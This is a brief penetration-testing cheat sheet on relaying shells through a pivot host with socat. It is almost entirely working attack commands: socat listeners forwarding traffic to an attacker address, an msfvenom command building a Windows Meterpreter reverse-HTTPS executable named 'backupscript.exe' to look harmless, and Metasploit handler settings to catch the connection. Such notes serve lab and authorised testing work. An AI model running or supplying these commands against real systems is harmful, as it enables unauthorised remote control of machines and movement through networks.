SoCat

Socat Listener Reverse Shell

# Example: socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:80
socat TCP4-LISTEN:<local-port>,fork TCP4:10.10.14.18:<remote-port>

# Generate Payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=8080

# msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 80
run

Socat Redirection with Bind Shells

# Example: socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443
socat TCP4-LISTEN:<listen-port>,fork TCP4:172.16.5.19:<port-needs-to-be-forwarded>

Last updated